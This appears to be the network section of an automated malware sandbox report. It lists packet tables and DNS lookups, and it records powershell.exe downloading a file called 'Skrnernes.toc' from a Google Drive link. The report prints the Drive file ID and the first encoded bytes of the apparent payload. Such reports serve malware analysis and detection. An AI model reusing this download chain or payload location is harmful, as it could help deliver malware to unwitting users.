                                                                Mar 10, 2025 20:39:05.215236902 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.216255903 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.216329098 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.216392040 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.216453075 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.217596054 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.217654943 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.217686892 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.217741966 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.217802048 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.217854977 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.238135099 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.238189936 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.238255978 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.238306999 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.238661051 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.238722086 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.238730907 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.238785028 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.238791943 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.238842964 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.239958048 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.240015030 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.240022898 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.240077019 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.241178989 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.241235971 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.241249084 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.241302013 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.242490053 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.242544889 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.242552042 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.242604017 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.243607998 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.243663073 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.243669987 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.243725061 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.245551109 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.245626926 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.245632887 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.245676994 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.245682955 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.245724916 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.246558905 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.246619940 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.248495102 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.248557091 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.248573065 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.248640060 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.249114037 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.249167919 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.249222994 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.249277115 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.250384092 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.250449896 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.250456095 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.250503063 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.265422106 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.265467882 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.265518904 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.265527010 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.265590906 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.265639067 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.266555071 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.266623020 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.266628981 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.266689062 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.267692089 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.267760038 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.267765045 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.267884970 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.279856920 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.279942036 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.297884941 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.297964096 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.297972918 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.298022032 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.298300982 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.298357010 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.298363924 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.298441887 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.299478054 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.299531937 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.299535990 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.299587965 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.300682068 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.300741911 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.300746918 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.300792933 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.301811934 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.301867008 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.301871061 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.301924944 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.301929951 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.301980972 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.303023100 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.303081989 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.303087950 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.303133965 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.304132938 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.304209948 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.304217100 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.304285049 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.305326939 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.305382967 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.305383921 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.305392027 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.305429935 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.305454016 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.306458950 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.306513071 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.306519032 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.306580067 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.307626009 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.307679892 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.307684898 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.307739973 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.308829069 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.308881998 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.308887959 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.308938980 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.311527967 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.311582088 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.311594963 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.311599970 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.311631918 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.311655998 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.311857939 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.311906099 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.311912060 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.311953068 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.331576109 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.331631899 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.331633091 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.331640959 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.331671953 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.331687927 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.332282066 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.332367897 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.332374096 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.332417965 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.333503962 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.333559036 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.333563089 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.333606958 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.334470034 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.334517956 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.334520102 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.334526062 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.334589958 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.335629940 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.335680008 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.335685968 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.335736036 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.375648975 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.375725031 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.375731945 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.375741959 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.375777960 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.376697063 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.376753092 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.376759052 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.376804113 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.377808094 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.377862930 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.377867937 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.377911091 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.378926992 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.378978968 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.378983021 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.379023075 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.379029989 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.379064083 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.380162001 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.380244970 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.380249023 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.380326986 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.381437063 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.381489038 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.381494999 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.381532907 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.382605076 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.382656097 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.382662058 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.382702112 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.383903980 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.383956909 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.383966923 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.383971930 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.383999109 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.384018898 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.384871960 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.384926081 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.384932041 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.384974957 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.386110067 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.386167049 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.386181116 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.386224031 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.386229038 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.386261940 CET44349717172.217.16.193192.168.2.5
                                                                Mar 10, 2025 20:39:05.386271954 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.386307001 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.386364937 CET49717443192.168.2.5172.217.16.193
                                                                Mar 10, 2025 20:39:05.386382103 CET44349717172.217.16.193192.168.2.5

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 10, 2025 20:37:37.617556095 CET5176253192.168.2.51.1.1.1
                                                                Mar 10, 2025 20:37:37.627533913 CET53517621.1.1.1192.168.2.5
                                                                Mar 10, 2025 20:37:40.103723049 CET5717453192.168.2.51.1.1.1
                                                                Mar 10, 2025 20:37:40.110589981 CET53571741.1.1.1192.168.2.5
                                                                Mar 10, 2025 20:37:43.176711082 CET5969153192.168.2.51.1.1.1
                                                                Mar 10, 2025 20:37:43.184544086 CET53596911.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Mar 10, 2025 20:37:37.617556095 CET192.168.2.51.1.1.10xb94fStandard query (0)Host_6637.6637.6637.657eA (IP address)IN (0x0001)false
                                                                Mar 10, 2025 20:37:40.103723049 CET192.168.2.51.1.1.10xa486Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Mar 10, 2025 20:37:43.176711082 CET192.168.2.51.1.1.10xfa2bStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Mar 10, 2025 20:37:37.627533913 CET1.1.1.1192.168.2.50xb94fName error (3)Host_6637.6637.6637.657enonenoneA (IP address)IN (0x0001)false
                                                                Mar 10, 2025 20:37:40.110589981 CET1.1.1.1192.168.2.50xa486No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                Mar 10, 2025 20:37:43.184544086 CET1.1.1.1192.168.2.50xfa2bNo error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • drive.google.com
                                                                • drive.usercontent.google.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549707142.250.181.2384437624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-10 19:37:42 UTC215OUTGET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                Host: drive.google.com
                                                                Connection: Keep-Alive
                                                                2025-03-10 19:37:43 UTC1610INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Mon, 10 Mar 2025 19:37:42 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-8ta7hqKdrt06UvZo71AUXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549708142.250.181.2384437624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-10 19:37:49 UTC97OUTGET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1
                                                                Host: drive.google.com
                                                                2025-03-10 19:37:50 UTC1319INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Mon, 10 Mar 2025 19:37:50 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-m1lWY7PWaqjRAEzx2j-LBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549709172.217.16.1934437624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-10 19:37:52 UTC139OUTGET /download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download HTTP/1.1
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2025-03-10 19:37:55 UTC5016INHTTP/1.1 200 OK
                                                                X-GUploader-UploadID: AKDAyItu9u0Fk2JKwE4KIseLiJYLgxeq1HSa_D12zuxm85TLIyjrFsjcVhpLfgF4cBCQKVdIfKHZ5d0
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="Skrnernes.toc"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 516244
                                                                Last-Modified: Mon, 10 Mar 2025 08:05:57 GMT
                                                                Date: Mon, 10 Mar 2025 19:37:55 GMT
                                                                Expires: Mon, 10 Mar 2025 19:37:55 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=M+qklQ==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2025-03-10 19:37:55 UTC5016INData Raw: 5a 73 48 75 41 49 44 35 4d 4c 75 54 57 77 77 41 5a 6f 58 62 5a 6f 58 41 41 31 77 6b 42 4d 44 6f 41 4a 75 35 33 6b 37 6b 4c 47 61 44 38 51 44 41 34 41 43 42 36 55 35 32 5a 2f 51 39 76 41 37 43 59 32 61 42 2f 70 34 62 67 65 6d 51 32 48 77 34 5a 6f 50 75 41 43 44 53 5a 6f 48 36 75 4b 79 46 32 37 71 64 50 55 74 4c 67 4d 4d 41 77 65 67 41 77 65 63 41 6b 44 48 4b 67 2f 4d 41 5a 6f 48 2f 59 31 43 4a 46 41 75 62 67 2f 49 41 30 65 4a 6d 49 66 2b 44 77 67 43 44 77 51 51 67 32 79 48 62 67 66 6b 74 31 38 59 44 66 4e 53 51 44 41 43 4c 52 43 51 45 49 4e 74 6d 67 66 6c 71 79 49 6e 44 49 4d 42 6d 77 65 63 41 67 63 4d 36 38 6f 73 43 67 4f 6b 41 32 64 43 36 6e 6e 47 36 4d 66 67 68 77 49 48 71 53 50 42 45 50 49 50 7a 41 47 61 44 77 51 43 42 77 71 70 2b 69 67 6f 4d 41 47 59
                                                                Data Ascii: ZsHuAID5MLuTWwwAZoXbZoXAA1wkBMDoAJu53k7kLGaD8QDA4ACB6U52Z/Q9vA7CY2aB/p4bgemQ2Hw4ZoPuACDSZoH6uKyF27qdPUtLgMMAwegAwecAkDHKg/MAZoH/Y1CJFAubg/IA0eJmIf+DwgCDwQQg2yHbgfkt18YDfNSQDACLRCQEINtmgflqyInDIMBmwecAgcM68osCgOkA2dC6nnG6MfghwIHqSPBEPIPzAGaDwQCBwqp+igoMAGY
